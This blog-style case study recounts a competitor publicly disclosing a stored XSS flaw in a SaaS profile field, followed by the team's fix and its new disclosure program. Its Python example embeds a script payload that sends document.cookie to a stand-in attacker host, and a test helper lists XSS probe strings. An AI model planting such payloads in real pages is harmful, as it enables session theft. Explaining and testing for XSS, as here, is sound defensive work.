TL;DR
A competitor discovered an XSS vulnerability in a project management SaaS product and tweeted about it before contacting the company. The public disclosure was embarrassing and felt unfair, but it taught the team important lessons about security, competition, and the value of having a vulnerability disclosure program in place.
The Tweet
The CTO of a growing project management SaaS was having a normal Tuesday morning when the cofounder sent a link to a tweet. It was from a developer at a competing company.
"Just found a stored XSS vulnerability in their product. User input in profiles isn't sanitized. Anyone using this for sensitive data should be careful. @their handle you might want to look at this."
The tweet had a screenshot showing malicious JavaScript executing in the app. It already had 200+ retweets.
The Initial Reaction
The CTO's first emotion was anger. Why didn't they contact the company privately? Why tweet it with screenshots? This felt like an attack disguised as helpfulness.
The second emotion was panic. If this was real (and the screenshot suggested it was), the product had a serious vulnerability that was now public knowledge.
The third emotion, after calming down, was acceptance. Whatever the competitor's motives, the vulnerability existed. And that was the team's fault, not theirs.
Validating the Report
Within 10 minutes, the engineering team confirmed the vulnerability. The user profile "bio" field accepted HTML and JavaScript. When other users viewed a profile, the malicious code would execute in their browsers.
This was bad. An attacker could:
- Steal session tokens
- Redirect users to phishing pages
- Modify what users saw on the page
- Perform actions as the victim user
How the team missed it: The bio field was added in a quick feature update. The developer assumed the frontend framework would handle sanitization. It didn't. There was no code review, no security testing. Classic "ship fast, fix later" thinking.
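In code terms, the vulnerable pattern looked something like this. This is a minimal Python sketch, not the product's actual code; the function name and payload are illustrative:

```python
# Hypothetical sketch of the vulnerable pattern -- NOT the product's real code.
def render_profile_vulnerable(bio: str) -> str:
    # BUG: raw interpolation of user input into HTML, with no escaping anywhere.
    return f"<div class='profile-bio'>{bio}</div>"

# A bio like this would execute in every viewer's browser:
payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
page = render_profile_vulnerable(payload)  # the <script> tag survives intact
```

Nothing in that path ever questions the input, which is why the assumption that "the framework handles it" was so dangerous.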
The Fix and Response
Technical Fix (30 minutes)
- Added input sanitization on the server side
- Added output encoding when rendering bios
- Sanitized all existing bio content in the database
- Added automated tests to prevent regression
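The output-encoding and regression-test items can be sketched in a few lines of Python. The names are illustrative, and `html.escape` stands in for whatever encoding helper the actual stack provides:

```python
import html

def render_profile(bio: str) -> str:
    # Output encoding on render: HTML metacharacters become entities, so the
    # browser displays the payload as text instead of executing it.
    return f"<div class='profile-bio'>{html.escape(bio, quote=True)}</div>"

def test_bio_is_encoded():
    # Regression test mirroring the last item of the fix list above.
    rendered = render_profile("<script>alert(1)</script>")
    assert "<script>" not in rendered
    assert "&lt;script&gt;" in rendered
```

Encoding at render time (rather than only sanitizing at write time) also covers any malicious content that was already sitting in the database.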
Public Response
The company replied to the tweet publicly:
"Thank you for reporting this. We've confirmed the vulnerability and deployed a fix within 30 minutes. We appreciate security reports and have set up security@our domain for future disclosures. We take this seriously and are reviewing our processes."
This response was carefully crafted. The team thanked the competitor (even though they were frustrated), confirmed they took it seriously, announced the fix, and showed they were learning from it.
The Aftermath
Customer Reaction
Some customers reached out concerned. The company sent a proactive email to all users explaining what happened, what was at risk, and what was done to fix it. Most appreciated the transparency.
The company lost two customers over it. It gained one who specifically said they liked how the situation was handled.
The Competitor
The team never spoke to the competitor directly about it. Part of him wanted to call them out for the public disclosure. But the more the CTO thought about it, the more he realized:
- They didn't create the vulnerability; the team did
- The company didn't have a clear way for people to report security issues
- Public disclosure, while uncomfortable, got the team to fix it faster
The uncomfortable truth: If the company had a security contact, a vulnerability disclosure program, or a bug bounty, the competitor might have reported it privately. The public disclosure happened because the team made it the only visible option.
What the Team Changed
Vulnerability Disclosure Program
The company created a security.txt file and a clear process for reporting vulnerabilities. They committed to responding within 24 hours and fixing critical issues within 72 hours.
Security Review Process
Any feature that handles user input now requires a security review. The team created a checklist: sanitization, encoding, validation, access control.
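One way to make a checklist like that enforceable is to encode part of it as a reusable test helper. A hypothetical sketch; the payload list is illustrative, not exhaustive:

```python
import html

# Checklist-as-code: payloads that any feature handling user input must
# neutralize before a security review is signed off.
XSS_PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    '"><svg onload=alert(1)>',
]

def passes_review(render) -> bool:
    # A render function passes only if no payload survives un-encoded.
    return all(p not in render(p) for p in XSS_PAYLOADS)

# An encoder-backed renderer passes; an identity renderer does not.
assert passes_review(lambda s: html.escape(s, quote=True))
assert not passes_review(lambda s: s)
```

A helper like this doesn't replace human review of validation and access control, but it keeps the sanitization and encoding items from regressing silently.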
Automated Security Scanning
The team added automated security scanning to the CI/CD pipeline. It catches common vulnerabilities like XSS before they reach production.
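As one possible shape for that pipeline step, here is a minimal GitHub Actions job running Semgrep. The tool choice and file name are assumptions, not the team's actual setup; any static scanner slots into the pipeline the same way:

```yaml
# .github/workflows/security-scan.yml -- illustrative, not the team's config
name: security-scan
on: [push, pull_request]
jobs:
  semgrep:
    runs-on: ubuntu-latest
    container: semgrep/semgrep
    steps:
      - uses: actions/checkout@v4
      # --error makes the job fail the build when findings are reported
      - run: semgrep scan --config auto --error
```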
Regular Audits
Quarterly security reviews of the codebase, focusing on areas that handle user input, authentication, and data access.
Lessons on Competition and Security
This experience taught the team that security vulnerabilities don't care about competitive dynamics. Users are at risk regardless of who finds the flaw.
Yes, the competitor could have handled it better. But so could the company. They could have:
- Not had the vulnerability in the first place
- Had a clear way for anyone to report security issues
- Been doing regular security testing themselves
Blaming the messenger doesn't fix the message.
Should security researchers always disclose privately first?
Responsible disclosure norms suggest giving vendors time to fix issues before going public. However, if there's no clear way to report issues or vendors don't respond, public disclosure becomes more justifiable.
How do I set up a vulnerability disclosure program?
Start simple: create a security.txt file (securitytxt.org), add a security contact email, and publish a basic policy stating how you'll handle reports. You can expand to bug bounties later.
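A minimal security.txt, following RFC 9116, can be as short as this (the domain, dates, and URLs are placeholders):

```
# Served from https://example.com/.well-known/security.txt (see RFC 9116)
Contact: mailto:security@example.com
Expires: 2026-12-31T23:59:59Z
Policy: https://example.com/security-policy
Preferred-Languages: en
```

The `Contact` and `Expires` fields are the only required ones; the rest signal that reports will actually be read and acted on.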
What's the difference between XSS types?
Stored XSS (like this case) saves malicious code in your database and executes when others view it. Reflected XSS comes from URL parameters. DOM-based XSS happens entirely in client-side code. All are serious.
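The stored and reflected variants can be sketched side by side in a few hypothetical Python functions (DOM-based XSS lives entirely in client-side JavaScript, so it isn't shown). Both functions below render unescaped input, which is the bug:

```python
profiles = {}  # stands in for the database

def save_bio(user: str, bio: str) -> None:
    profiles[user] = bio  # stored XSS: the payload persists...

def view_profile(user: str) -> str:
    return f"<p>{profiles[user]}</p>"  # ...and fires for every later viewer

def search_page(query: str) -> str:
    # Reflected XSS: the payload round-trips through a request parameter
    # and only affects whoever follows the crafted URL.
    return f"<p>No results for {query}</p>"
```

The fix is the same in both cases, encode on output, but stored XSS is the more dangerous variant because the attacker plants it once and every subsequent viewer is hit.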
How should I respond to public vulnerability disclosure?
Acknowledge quickly, thank the reporter (regardless of method), confirm you're investigating, announce when fixed. Don't be defensive or attack the reporter. Focus on protecting users.
Find Vulnerabilities First
Scan your app for XSS and other security issues before someone else does.